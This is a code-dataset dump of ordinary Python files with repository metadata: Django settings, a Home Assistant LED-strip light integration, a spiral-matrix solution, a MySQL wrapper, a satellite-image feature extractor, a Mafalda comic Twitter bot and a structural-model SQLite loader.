| 30.607843 | 88 | 0.679052 | 225 | 1,561 | 4.506667 | 0.368889 | 0.015779 | 0.027613 | 0.04931 | 0.019724 | 0.019724 | 0 | 0 | 0 | 0 | 0 | 0.009967 | 0.2287 | 1,561 | 50 | 89 | 31.22 | 0.832226 | 0.189622 | 0 | 0 | 0 | 0 | 0.019417 | 0.019417 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.206897 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
472df55e17729fcc47b160990f5f92d48d797df5 | 5,647 | py | Python | config/settings.py | jochenklar/django-project | ae46a6bdaf7a7711a3862009754c27f953d5f8eb | [
"MIT"
] | null | null | null | config/settings.py | jochenklar/django-project | ae46a6bdaf7a7711a3862009754c27f953d5f8eb | [
"MIT"
] | null | null | null | config/settings.py | jochenklar/django-project | ae46a6bdaf7a7711a3862009754c27f953d5f8eb | [
"MIT"
] | null | null | null | import os
from pathlib import Path
import dj_database_url
from django.utils.translation import gettext_lazy as _
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = os.getenv('SECRET_KEY')
DEBUG = (os.getenv('DEBUG', 'False').upper() == 'TRUE')
DEBUG_TOOLBAR = (os.getenv('DEBUG_TOOLBAR', 'False').upper() == 'TRUE')
ALLOWED_HOSTS = os.getenv('ALLOWED_HOSTS', 'localhost 127.0.0.1 ::1').split()
INTERNAL_IPS = ['127.0.0.1']
SITE_ID = 1
INSTALLED_APPS = [
# django apps
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.sites',
'django.contrib.staticfiles',
# 3rd party apps
'django_extensions',
]
if DEBUG_TOOLBAR:
INSTALLED_APPS += [
'debug_toolbar',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django_settings_export.settings_export'
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
if os.getenv('DATABASE'):
DATABASES = {
'default': dj_database_url.parse(os.getenv('DATABASE'))
}
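# Example (hypothetical values): dj_database_url parses standard database URLs,
# e.g. DATABASE=postgres://user:password@localhost:5432/mydb
# or DATABASE=sqlite:///db.sqlite3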
LANGUAGE_CODE = 'en-us'
LANGUAGES = [
('en', _('English')),
]
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static_root/')
STATICFILES_DIRS = []
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media_root/')
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
if os.getenv('EMAIL_HOST'):
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = os.getenv('EMAIL_HOST')
EMAIL_PORT = os.getenv('EMAIL_PORT', 25)
EMAIL_HOST_USER = os.getenv('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = os.getenv('EMAIL_HOST_PASSWORD')
EMAIL_USE_TLS = (os.getenv('EMAIL_USE_TLS', 'False').upper() == 'TRUE')
EMAIL_USE_SSL = (os.getenv('EMAIL_USE_SSL', 'False').upper() == 'TRUE')
DEFAULT_FROM_EMAIL = os.getenv('DEFAULT_FROM_EMAIL', 'noreply@example.com')
else:
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
if os.getenv('CACHE') == 'redis':
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
}
}
}
else:
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
SETTINGS_EXPORT = []
LOG_LEVEL = os.getenv('LOG_LEVEL', 'INFO')
LOG_DIR = os.getenv('LOG_DIR')
if LOG_DIR:
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue'
}
},
'formatters': {
'default': {
'format': '[%(asctime)s] %(levelname)s: %(message)s'
},
'name': {
'format': '[%(asctime)s] %(levelname)s %(name)s: %(message)s'
},
'console': {
'format': '[%(asctime)s] %(message)s'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'error': {
'level': 'ERROR',
'class': 'logging.FileHandler',
'filename': os.path.join(LOG_DIR, 'error.log'),
'formatter': 'default'
},
'app': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(LOG_DIR, 'app.log'),
'formatter': 'name'
},
'console': {
'level': 'INFO',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
'formatter': 'console'
}
},
'loggers': {
'django': {
'handlers': ['console'],
'level': LOG_LEVEL,
},
'django.request': {
'handlers': ['mail_admins', 'error'],  # the file handler defined above is named 'error'
'level': 'ERROR',
'propagate': True
},
'app': {
'handlers': ['app'],
'level': LOG_LEVEL,
'propagate': False
}
}
}
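# Example (hypothetical values): point LOG_DIR at a writable directory to enable
# file logging, e.g. LOG_DIR=/var/log/django-project LOG_LEVEL=DEBUG;
# error.log then receives ERROR records and app.log the 'app' logger output.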
| 28.376884 | 79 | 0.556933 | 533 | 5,647 | 5.703565 | 0.311445 | 0.044737 | 0.029934 | 0.022368 | 0.095724 | 0.067105 | 0.030921 | 0.030921 | 0.030921 | 0 | 0 | 0.007731 | 0.289888 | 5,647 | 198 | 80 | 28.520202 | 0.750374 | 0.004604 | 0 | 0.10119 | 0 | 0 | 0.422036 | 0.217515 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.005952 | 0.02381 | 0 | 0.02381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4731fabfe155fe4caec4fa4a58fe927e97e941d4 | 4,935 | py | Python | custom_components/magicstrip/light.py | elahd/ha-magicstrip | f33aeafc4a313d8674591e44c0d1d9c11c91e9cd | [
"MIT"
] | null | null | null | custom_components/magicstrip/light.py | elahd/ha-magicstrip | f33aeafc4a313d8674591e44c0d1d9c11c91e9cd | [
"MIT"
] | null | null | null | custom_components/magicstrip/light.py | elahd/ha-magicstrip | f33aeafc4a313d8674591e44c0d1d9c11c91e9cd | [
"MIT"
] | null | null | null | """MagicStrip light implementation."""
from __future__ import annotations
import logging
from typing import Any, MutableMapping
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_EFFECT,
ATTR_RGB_COLOR,
COLOR_MODE_RGB,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_EFFECT,
LightEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import DeviceInfo, Entity
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.update_coordinator import (
CoordinatorEntity,
DataUpdateCoordinator,
UpdateFailed,
)
from pymagicstrip import MagicStripDevice, MagicStripState
from pymagicstrip.errors import BleConnectionError
from . import DeviceState, async_setup_entry_platform
from .const import DEFAULT_BRIGHTNESS, DEFAULT_COLOR, DEFAULT_EFFECT
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up tuya sensors dynamically through tuya discovery."""
def _constructor(device_state: DeviceState) -> list[Entity]:
return [
MagicStripLight(
device_state.coordinator,
device_state.device,
device_state.light_device_info,
device_state.light_extra_state_attributes,
)
]
async_setup_entry_platform(hass, config_entry, async_add_entities, _constructor)
class MagicStripLight(CoordinatorEntity[MagicStripState], LightEntity):
"""MagicStrip light entity."""
def __init__(
self,
coordinator: DataUpdateCoordinator[MagicStripState],
device: MagicStripDevice,
device_info: DeviceInfo,
extra_state_attributes: MutableMapping[str, Any],
):
"""Create MagicStrip light."""
super().__init__(coordinator)
self._device = device
self._attr_supported_color_modes = [COLOR_MODE_RGB]
        self._attr_supported_features = (
            SUPPORT_EFFECT | SUPPORT_BRIGHTNESS | SUPPORT_COLOR  # bitwise OR is idiomatic for feature bit flags
        )
self._attr_color_mode = COLOR_MODE_RGB
self._attr_effect_list = self._device.state.effects_list + [DEFAULT_EFFECT]
self._attr_unique_id = device.address
self._attr_device_info = device_info
self._attr_extra_state_attributes = extra_state_attributes
self._attr_name = device_info["default_name"]
self._attr_icon: str = "mdi:led-strip-variant"
    # This device doesn't return color and brightness statuses. If we pass None to Home Assistant, it will display
# a light without brightness, color, or effect functions. To ensure that all functions are available, we substitute
# hard-coded values for None.
@property
def effect(self) -> str | None:
"""Return the current effect."""
if data := self.coordinator.data:
return DEFAULT_EFFECT if not data.effect else data.effect
return None
@property
def rgb_color(self) -> tuple[int, int, int] | None:
"""Return the rgb color value [int, int, int]."""
if data := self.coordinator.data:
return DEFAULT_COLOR if not data.color else data.color
return None
@property
def brightness(self) -> int | None:
"""Return the brightness of this light between 0..255."""
if data := self.coordinator.data:
return DEFAULT_BRIGHTNESS if not data.brightness else data.brightness
return None
@property
def is_on(self) -> bool | None:
"""Return True if entity is on."""
if data := self.coordinator.data:
return data.on
return None
async def async_turn_off(self, **kwargs) -> None:
"""Turn device off."""
if self.is_on:
await self._device.toggle_power()
self.coordinator.async_set_updated_data(self._device.state)
async def async_turn_on(self, **kwargs) -> None:
"""Turn device on."""
try:
if not self.is_on:
await self._device.toggle_power()
if ATTR_BRIGHTNESS in kwargs:
await self._device.set_brightness(int(kwargs[ATTR_BRIGHTNESS]))
if (
ATTR_RGB_COLOR in kwargs
and (rgb_color := kwargs[ATTR_RGB_COLOR]) != self.rgb_color
):
await self._device.set_color(rgb_color[0], rgb_color[1], rgb_color[2])
if ATTR_EFFECT in kwargs and (effect := kwargs[ATTR_EFFECT]) != self.effect:
effect = None if effect == DEFAULT_EFFECT else effect
await self._device.set_effect_name(effect)
except BleConnectionError as exc:
raise UpdateFailed from exc
self.coordinator.async_set_updated_data(self._device.state)
| 32.9 | 119 | 0.674772 | 562 | 4,935 | 5.661922 | 0.265125 | 0.025141 | 0.02357 | 0.026398 | 0.125393 | 0.097737 | 0.087995 | 0.052168 | 0.030798 | 0 | 0 | 0.001885 | 0.247416 | 4,935 | 149 | 120 | 33.120805 | 0.854873 | 0.09848 | 0 | 0.173077 | 0 | 0 | 0.007662 | 0.004876 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.125 | 0.009615 | 0.278846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b26a2989cc751d061fee5e02533b62c0199aa67 | 1,407 | py | Python | matrix/spiralOrder.py | nishantml/100-days-of-code | fdbd7f8d195363467ab462bd4f0774a34379a769 | [
"MIT"
] | 1 | 2021-03-20T12:23:31.000Z | 2021-03-20T12:23:31.000Z | matrix/spiralOrder.py | nishantml/100-days-of-code | fdbd7f8d195363467ab462bd4f0774a34379a769 | [
"MIT"
] | null | null | null | matrix/spiralOrder.py | nishantml/100-days-of-code | fdbd7f8d195363467ab462bd4f0774a34379a769 | [
"MIT"
] | null | null | null | """
Given an m x n matrix, return all elements of the matrix in spiral order.
Example 1:
Input: matrix = [[1,2,3],[4,5,6],[7,8,9]]
Output: [1,2,3,6,9,8,7,4,5]
Example 2:
Input: matrix = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
Output: [1,2,3,4,8,12,11,10,9,5,6,7]
Constraints:
m == matrix.length
n == matrix[i].length
1 <= m, n <= 10
-100 <= matrix[i][j] <= 100
"""
from typing import List
class Solution:
def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
direction = 0
        left = 0
right = len(matrix[0]) - 1
top = 0
bottom = len(matrix) - 1
res = []
while left <= right and top <= bottom:
if direction == 0:
for i in range(left, right + 1):
res.append(matrix[top][i])
top += 1
elif direction == 1:
for i in range(top, bottom + 1):
res.append(matrix[i][right])
right -= 1
elif direction == 2:
for i in range(right, left - 1, -1):
res.append(matrix[bottom][i])
bottom -= 1
elif direction == 3:
for i in range(bottom, top - 1, -1):
res.append(matrix[i][left])
left += 1
direction = (direction + 1) % 4
return res
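if __name__ == "__main__":
    # Minimal demo (added): exercises the two documented examples above.
    s = Solution()
    print(s.spiralOrder([[1, 2, 3], [4, 5, 6], [7, 8, 9]]))
    # -> [1, 2, 3, 6, 9, 8, 7, 4, 5]
    print(s.spiralOrder([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]))
    # -> [1, 2, 3, 4, 8, 12, 11, 10, 9, 5, 6, 7]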
| 22.693548 | 73 | 0.471215 | 202 | 1,407 | 3.282178 | 0.29703 | 0.012066 | 0.0181 | 0.066365 | 0.138763 | 0.060332 | 0.060332 | 0.060332 | 0.060332 | 0.060332 | 0 | 0.09215 | 0.375267 | 1,407 | 61 | 74 | 23.065574 | 0.662116 | 0.278607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.035714 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b2c78d7a80a1e068c05e2fcdde3201711ae2bcd | 2,161 | py | Python | telegram_ecommerce/database/db_wrapper.py | Anonylions/telegram_ecommerce | f5382886bbebf607c735e2f451774c56df8d6011 | [
"MIT"
] | 10 | 2020-11-20T20:55:52.000Z | 2022-02-10T20:25:45.000Z | telegram_ecommerce/database/db_wrapper.py | Anonylions/telegram_ecommerce | f5382886bbebf607c735e2f451774c56df8d6011 | [
"MIT"
] | 1 | 2022-02-16T10:28:18.000Z | 2022-02-16T10:35:31.000Z | telegram_ecommerce/database/db_wrapper.py | Anonylions/telegram_ecommerce | f5382886bbebf607c735e2f451774c56df8d6011 | [
"MIT"
] | 8 | 2021-05-01T01:13:09.000Z | 2022-03-13T14:00:01.000Z |
import mysql.connector as connector
from ..utils.utils import get_sql_commands_from_a_file
from ..utils.consts import db_credentials
from ..utils.log import logger
class DBWrapper():
def __init__(self, db_credentials):
self.database_name = "telegram_ecommerce"
self.connection = connector.connect(**db_credentials)
self.connection.get_warnings = True
if not self.this_db_exist():
self.create_db()
self.use_this_db()
self.create_tables()
else:
self.use_this_db()
def create_db(self):
create_db_command = (
"CREATE DATABASE {database_name}"
.format(database_name=self.database_name))
self.execute_a_data_manipulation(create_db_command)
def create_tables(self):
create_tables_file = "telegram_ecommerce/database/create_tables.sql"
commands = get_sql_commands_from_a_file(create_tables_file)
cursor = self.connection.cursor()
for command in commands:
cursor.execute(command)
self.connection.commit()
cursor.close()
def use_this_db(self):
create_db_command = (
"USE {database_name}"
.format(database_name=self.database_name))
self.execute_a_data_manipulation(create_db_command)
def this_db_exist(self):
database_name_tuple = (self.database_name,)
databases_name_list = self.execute_a_query("SHOW DATABASES")
return database_name_tuple in databases_name_list
def execute_a_query(self, command, params=(), multi=False):
cursor = self.connection.cursor()
cursor.execute(command, params, multi)
rows = cursor.fetchall()
cursor.close()
return rows
def execute_a_data_manipulation(self, command, params=(), multi=False):
cursor = self.connection.cursor()
cursor.execute(command, params, multi)
self.connection.commit()
cursor.close()
def close(self):
self.connection.close()
db = DBWrapper(db_credentials)
logger.info("conected to database {}".format(db.database_name))
| 29.202703 | 76 | 0.661731 | 255 | 2,161 | 5.301961 | 0.239216 | 0.097633 | 0.059172 | 0.053254 | 0.39497 | 0.344675 | 0.260355 | 0.260355 | 0.260355 | 0.260355 | 0 | 0 | 0.245257 | 2,161 | 73 | 77 | 29.60274 | 0.828939 | 0 | 0 | 0.346154 | 0 | 0 | 0.069477 | 0.020843 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.076923 | 0 | 0.288462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b2dd18e1ecfbb5e9df7c4c7ce61b73c2c764de6 | 5,334 | py | Python | satsense/extract.py | fossabot/satsense | 6666dd01a6988a86319c71a8f8802bf4b096c550 | [
"Apache-2.0"
] | 22 | 2018-03-14T10:29:38.000Z | 2022-03-29T10:54:51.000Z | satsense/extract.py | fdbesanto2/satsense | b0fa650193995a30328f26a36ebab2437c0e37ef | [
"Apache-2.0"
] | 49 | 2018-05-25T13:28:07.000Z | 2021-07-31T09:48:02.000Z | satsense/extract.py | fdbesanto2/satsense | b0fa650193995a30328f26a36ebab2437c0e37ef | [
"Apache-2.0"
] | 11 | 2018-04-24T08:55:28.000Z | 2021-02-17T22:32:05.000Z | """Module for computing features."""
import logging
from concurrent.futures import ProcessPoolExecutor
from functools import partial
from itertools import groupby
from os import cpu_count
from typing import Iterator
import numpy as np
from .features import Feature
from .generators import FullGenerator
from .image import FeatureVector
logger = logging.getLogger(__name__)
def extract_features(features: Iterator[Feature],
generator: FullGenerator,
n_jobs: int = -1):
"""Compute features.
Parameters
----------
features:
Iterable of features.
generator:
Generator providing the required windows on the image.
n_jobs:
The maximum number of processes to use. The default is to use the
value returned by :func:`os.cpu_count`.
Yields
------
:obj:`satsense.FeatureVector`
The requested feature vectors.
Examples
--------
Extracting features from an image::
import numpy as np
from satsense import Image
from satsense.generators import FullGenerator
from satsense.extract import extract_features
from satsense.features import NirNDVI, HistogramOfGradients, Pantex
# Define the features to calculate
features = [
HistogramOfGradients(((50, 50), (100, 100))),
NirNDVI(((50, 50),)),
Pantex(((50, 50), (100, 100))),
]
# Load the image into a generator
# This generator splits the image into chunks of 10x10 pixels
image = Image('test/data/source/section_2_sentinel.tif', 'quickbird')
image.precompute_normalization()
generator = FullGenerator(image, (10, 10))
# Calculate all the features and append them to a list
vector = []
for feature_vector in extract_features(features, generator):
# The shape returned is (x, y, w, v)
# where x is the number of chunks in the x direction
# y is the number of chunks in the y direction
# w is the number of windows the feature uses
# v is the length of the feature per window
# Reshape the resulting vector so it is (x, y, w * v)
# e.g. flattened along the windows and features
data = feature_vector.vector.reshape(
*feature_vector.vector.shape[0:2], -1)
vector.append(data)
# dstack reshapes the vector into and (x, y, n)
# where n is the total length of all features
featureset = np.dstack(vector)
"""
if n_jobs == 1:
yield from _extract_features(features, generator)
else:
yield from _extract_features_parallel(features, generator, n_jobs)
def _extract_features_parallel(features, generator, n_jobs=-1):
"""Extract features in parallel."""
if n_jobs < 1:
n_jobs = cpu_count()
logger.info("Extracting features using at most %s processes", n_jobs)
generator.image.precompute_normalization()
# Split generator in chunks
generators = tuple(generator.split(n_chunks=n_jobs))
with ProcessPoolExecutor(max_workers=n_jobs) as executor:
for feature in features:
extract = partial(extract_feature, feature)
vector = np.ma.vstack(tuple(executor.map(extract, generators)))
yield FeatureVector(feature, vector, generator.crs,
generator.transform)
def _extract_features(features, generator):
"""Compute features."""
generator.image.precompute_normalization()
for itype, group in groupby(features, lambda f: f.base_image):
group = list(group)
logger.info("Loading base image %s", itype)
window_shapes = {
shape
for feature in group for shape in feature.windows
}
generator.load_image(itype, window_shapes)
for feature in group:
vector = extract_feature(feature, generator)
yield FeatureVector(feature, vector, generator.crs,
generator.transform)
def extract_feature(feature, generator):
"""Compute a single feature vector.
Parameters
----------
feature : Feature
The feature to calculate
generator:
Generator providing the required windows on the image.
"""
logger.info("Computing feature %s with windows %s and arguments %s",
feature.__class__.__name__, feature.windows, feature.kwargs)
if not generator.loaded_itype == feature.base_image:
logger.info("Loading base image %s", feature.base_image)
generator.load_image(feature.base_image, feature.windows)
shape = generator.shape + (len(feature.windows), feature.size)
vector = np.ma.zeros((np.prod(shape[:-1]), feature.size), dtype=np.float32)
vector.mask = np.zeros_like(vector, dtype=bool)
size = vector.shape[0]
i = 0
for window in generator:
if window.shape[:2] not in feature.windows:
continue
if i % (size // 10 or 1) == 0:
logger.info("%s%% ready", 100 * i // size)
if window.mask.any():
vector.mask[i] = True
else:
vector[i] = feature(window)
i += 1
vector.shape = shape
return vector
| 34.412903 | 79 | 0.630484 | 633 | 5,334 | 5.21643 | 0.270142 | 0.015142 | 0.027862 | 0.029073 | 0.149606 | 0.134464 | 0.11811 | 0.076317 | 0.076317 | 0.043004 | 0 | 0.014088 | 0.281402 | 5,334 | 154 | 80 | 34.636364 | 0.847378 | 0.407387 | 0 | 0.119403 | 0 | 0 | 0.051908 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059701 | false | 0 | 0.149254 | 0 | 0.223881 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b2e595b9f19bfb2e8967ee33be2a32475c6a58f | 2,319 | py | Python | main.py | lbellomo/mafalda_bot | a2037d266d3c7ba2129b65686d05c9611fd10c61 | [
"MIT"
] | 1 | 2021-02-20T16:33:37.000Z | 2021-02-20T16:33:37.000Z | main.py | lbellomo/mafalda_bot | a2037d266d3c7ba2129b65686d05c9611fd10c61 | [
"MIT"
] | null | null | null | main.py | lbellomo/mafalda_bot | a2037d266d3c7ba2129b65686d05c9611fd10c61 | [
"MIT"
] | null | null | null | import os
import sys
import time
from pathlib import Path
from random import choice
from codecs import decode
from base64 import b64decode
import tweepy
max_errors_count = 5
CONSUMER_KEY = os.environ["CONSUMER_KEY"]
CONSUMER_SECRET = os.environ["CONSUMER_SECRET"]
ACCESS_TOKEN = os.environ["ACCESS_TOKEN"]
ACCESS_TOKEN_SECRET = os.environ["ACCESS_TOKEN_SECRET"]
LANG = os.environ["LANG"]
if LANG == "es":
p_data = Path("crypt/")
file_sufix = ".png"
elif LANG == "pt":
p_data = Path("crypt_pt")
file_sufix = ".jpeg"
def remove_zero_from_start(s):
while s.startswith("0"):
s = s[1:]
return s
if __name__ == "__main__":
print("Starting ...")
valid_comics = list(p.name for p in p_data.iterdir())
comic = choice(valid_comics)
filename = comic + file_sufix
super_secret = (p_data / comic).read_text()
im_b = b64decode(decode(super_secret, "rot-13"))
p_im = Path(filename)
p_im.write_bytes(im_b)
if LANG == "es":
_, volumen, pagina, parte = comic.split("-")
if parte == "a":
parte = "1ra"
elif parte == "b":
parte = "2da"
status = f"Vol. {remove_zero_from_start(volumen)}, pag. {remove_zero_from_start(pagina)}, {parte} parte. #Mafalda #Quino"
elif LANG == "pt":
_, _, pagina, parte = comic.split("_")
if parte == "a":
parte = "um"
elif parte == "b":
parte = "dois"
elif parte == "c":
parte = "três"
elif parte == "d":
parte = "quatro"
status = f"Toda Mafalda, página {pagina}, parte {parte}. #Mafalda #Quino"
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
media = api.media_upload(filename)
errors_count = 0
while True:
try:
tweet = api.update_status(status=status, media_ids=[media.media_id])
except Exception as e:
print(f"Error found: {e}")
errors_count += 1
if errors_count == max_errors_count:
print("Max number of errors reached with twitter API!")
sys.exit(1)
time.sleep(errors_count + 1)
else:
break
print("Tweet done!")
| 24.670213 | 129 | 0.598103 | 298 | 2,319 | 4.426175 | 0.389262 | 0.058378 | 0.038666 | 0.050038 | 0.136467 | 0.051554 | 0.051554 | 0.051554 | 0 | 0 | 0 | 0.010143 | 0.277275 | 2,319 | 93 | 130 | 24.935484 | 0.77685 | 0 | 0 | 0.115942 | 0 | 0.014493 | 0.16947 | 0.028892 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014493 | false | 0 | 0.115942 | 0 | 0.144928 | 0.057971 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b2f1506a9908854c576dc2669ef2013acbe7667 | 1,787 | py | Python | steelpy/f2uModel/load/sqlite/main.py | svortega/steelpy | bef35eb8ab8728fc29f57b7070b5f3bac0b0e840 | [
"MIT"
] | 4 | 2021-09-28T12:52:01.000Z | 2022-02-24T22:30:22.000Z | steelpy/f2uModel/load/sqlite/main.py | svortega/steelpy | bef35eb8ab8728fc29f57b7070b5f3bac0b0e840 | [
"MIT"
] | null | null | null | steelpy/f2uModel/load/sqlite/main.py | svortega/steelpy | bef35eb8ab8728fc29f57b7070b5f3bac0b0e840 | [
"MIT"
] | null | null | null | #
# Copyright (c) 2009-2021 fem2ufo
#
# Python stdlib imports
#from typing import NamedTuple, Dict, List, Iterable, Union
# package imports
from steelpy.f2uModel.load.sqlite.basic_load import BasicLoadSQL
from steelpy.f2uModel.load.sqlite.combination import LoadCombSQL
from steelpy.f2uModel.results.sqlite.operation.process_sql import create_connection, create_table
#
#
#
class LoadingSQL:
__slots__ = ['_basic', '_combination', 'db_file']
def __init__(self, db_file: str,
                 db_system: str = "sqlite"):
"""
"""
self.db_file = db_file
self._basic = BasicLoadSQL(db_file)
self._combination = LoadCombSQL(db_file)
# create node table
self._create_table()
@property
def basic(self):
"""
"""
return self._basic
#
@property
def combination(self):
"""
"""
return self._combination
#
def _create_table(self):
""" """
table_load = "CREATE TABLE IF NOT EXISTS tb_Load(\
number INTEGER PRIMARY KEY NOT NULL,\
name INTEGER NOT NULL,\
title TEXT NOT NULL,\
type TEXT NOT NULL);"
table_comb_load = "CREATE TABLE IF NOT EXISTS tb_LoadCombIndex(\
number INTEGER PRIMARY KEY NOT NULL,\
load_number INTEGER NOT NULL REFERENCES tb_Load(number),\
bl_number INTEGER REFERENCES tb_Load(number),\
lc_number INTEGER REFERENCES tb_Load(number),\
factor DECIMAL NOT NULL);"
conn = create_connection(self.db_file)
create_table(conn, table_load)
create_table(conn, table_comb_load)
#
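# Hedged usage sketch (added; the file name is hypothetical):
#     loading = LoadingSQL("f2u_model.db")
#     loading.basic        # BasicLoadSQL handler
#     loading.combination  # LoadCombSQL handler
#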
# | 29.783333 | 97 | 0.588137 | 191 | 1,787 | 5.256545 | 0.34555 | 0.076693 | 0.047809 | 0.065737 | 0.243028 | 0.185259 | 0.055777 | 0 | 0 | 0 | 0 | 0.009983 | 0.327364 | 1,787 | 60 | 98 | 29.783333 | 0.825291 | 0.081142 | 0 | 0.125 | 0 | 0 | 0.019683 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.09375 | 0 | 0.34375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b2f83d5cd93c073ad130cc113bab25a1d03255b | 423 | py | Python | wrap/pybind11/pybind11/__init__.py | xxiao-1/gtsam | 8b1516f43ffdf6b5098fc282b566f2ee1edb50f6 | [
"BSD-3-Clause"
] | 84 | 2020-09-07T01:38:44.000Z | 2022-03-31T16:05:11.000Z | wrap/pybind11/pybind11/__init__.py | xxiao-1/gtsam | 8b1516f43ffdf6b5098fc282b566f2ee1edb50f6 | [
"BSD-3-Clause"
] | 39 | 2016-11-25T22:14:09.000Z | 2022-01-13T21:44:51.000Z | wrap/pybind11/pybind11/__init__.py | xxiao-1/gtsam | 8b1516f43ffdf6b5098fc282b566f2ee1edb50f6 | [
"BSD-3-Clause"
